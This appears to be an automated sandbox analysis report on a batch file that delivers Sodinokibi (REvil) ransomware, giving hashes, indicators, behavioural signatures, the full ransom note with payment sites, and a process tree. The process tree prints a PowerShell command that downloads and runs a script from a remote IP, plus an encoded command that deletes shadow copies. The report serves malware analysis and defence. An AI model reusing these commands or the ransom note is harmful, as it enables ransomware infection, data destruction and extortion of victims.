Analysis

  • max time kernel
    115s
  • max time network
    113s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    20-05-2020 14:10

General

  • Target

    76268c9536af4328d6c0da30152c5045.bat

  • Size

    215B

  • MD5

    572a573b2da48bc8e094db663f4d54cd

  • SHA1

    3f06e7dc06fac49d4c675ad67cd2ba2113fb6d1e

  • SHA256

    8f7ad3b1ae4a99516d4e47fa682097895f767f07cbaf4ac432636610ca16a237

  • SHA512

    d90c574c7012e4e58968023d625d18ccf5f713a2a9888e86bb10d692b5db6d9496cc0f3de1778ddfafebf64b5146ca625a58e09e2a939e7140cea9a00521b30d

Malware Config

Extracted

  • Language

    ps1

  • Source

    URLs
    ps1.dropper

    http://185.103.242.78/pastes/76268c9536af4328d6c0da30152c5045

Extracted

  • Path

    C:\4702c1-readme.txt

  • Family

    sodinokibi

  • Ransom Note

    ---=== Welcome.Schmersal. ===---

    [+] Whats Happen? [+]
    Your files are encrypted, and stolen, we already have your important files. You can check it: all files on your system has extension 4702c1. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).

    [+] What guarantees? [+]
    Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.

    [+] How to get access on website? [+]
    You have two ways:
    1) [Recommended] Using a TOR browser!
    a) Download and install TOR browser from this site: https://torproject.org/
    b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5B753BD63BD6B200
    2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
    a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
    b) Open our secondary website: http://decryptor.cc/5B753BD63BD6B200
    Warning: secondary website can be blocked, thats why first variant much better and more available.

    When you open our website, put the following data in the input form:
    Key: zpoRZwMjse1XOMEz8B5gQbxpBxdqnJCfPE+2b6q+Vz9gc2FCI1DeFUcvHSzfWL92 ZgDgBNLGPqZo8082VDJ6xkookSQUVTcVBtHta0tWd4VxYq/Tvy+TZsOKnOSJHxde HDhArZWYdEr3k1RQjezjUBRZGLOFgqDxCSbYRPADfV3645W77sLNAzFai1VyZ7GB FZcFu0/IouBEaPvsotY6SLPD1LcxZFJBqeBj4wKWvstywT35A4RLS2GEXK4ECrxp B3keI2eOYBv7/4Ixhqpa7B9xeIJeLic84rl9QDV3mH+cywEAvNEsC+AxxudMIwzB G8Dw66Rs9TBx7Wzm48tObD8M9POXixQ5ClhnMEZeFy3tcR4xTGxJpRaN4RztwuOg VNTGr3UmyTpJsQDdQ+2QarUAj000a3ldQQmTOxY4N4ELaJZXBRLA3Q/CUAxBjaC5 Xr/KaelnHmZlbWghFmDcKulnkenHYB8YIVaPVsrKed6bAUHfVvRJimevnP3n2kqj yg0E3P3kuy8EIRHksbcwA80SV6i4mj1OcO7ZZvtVwkgUQDR7cYuaIPhYdBnIit0B 8u1uiJXeUJC+XFHdkBd+xt2mBmGUdIZpVSBHD/WT+TOVIsi0nUNAbl6td1WpaYq4 pfftoJ7h1JyzUZF5IRAr/nyVTfz4/8Q3j1AXxLeh06EgJvqvEBlfiDybFJIvHQcv iRgPU5H8UkUjH/zyRp2OqM8/q6UbwaFBXJ+92DvUBHi2UROXT52JjUquK8E27HS+ a85MER7wcdSbIhE6uNDqH+TEMBAw01cN9v7e0wGMvTMyegwaeztXJsf6QlxMmdo3 pobpZQTTrpLsHaS6RCA7yaucDZ0Fq1izbc2E0gQqEBdfeen9FXo0r/z1hSpZ9UCK dgP7gxIf/QDq1DRh+N+THadDW2Xoni9/CYXV12e9xQaVgiX6vfICJJqJupVzPCxB jMOm3FRnp1J/in8VEwr41HPuSK4QBaTxnYMwGDY8V7vH2HYR3Xc1I+CBdBqIxXv/ QOrN6zzSTYnlPK+s5q+IBoZga9wDDxoPDz6KGVUaWrpbWokD+z92FUe56++WCoad lOsn901W1MiRbaZJGpB1XT+2VsaFwgJy6rqcKyF91cnxLxzB2ULOuvceibw3ttlo A26Em55Vvk1FNRigZ7B5kQSTJl3NFJi1iQsDf4JfsD8EhqneYeNIiqCawH3NTVTu Iyi30XFw7fGtXExnd5vtK3DzNWDoLWRVUmp0ewA66+Oh3MAv1ABIO3H5PFt5n4Qh UY8IJBen1rXWZS5y6BUCs4SZmtH5Ikon1sgEB9RRbKM=

    -----------------------------------------------------------------------------------------

    !!! DANGER !!!
    DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data.
    !!! !!! !!!
    ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
    !!! !!! !!!

  • URLs

    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5B753BD63BD6B200

    http://decryptor.cc/5B753BD63BD6B200

Signatures

  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Modifies service 2 TTPs 4 IoCs
  • Drops file in Program Files directory 32 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives 3 TTPs
  • Blacklisted process makes network request 89 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\76268c9536af4328d6c0da30152c5045.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1008
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/76268c9536af4328d6c0da30152c5045');Invoke-ANLMXOIN;Start-Sleep -s 10000"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Drops file in Program Files directory
      • Modifies system certificate store
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Sets desktop wallpaper using registry
      • Drops file in System32 directory
      • Blacklisted process makes network request
      PID:1424
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1548
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:528

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms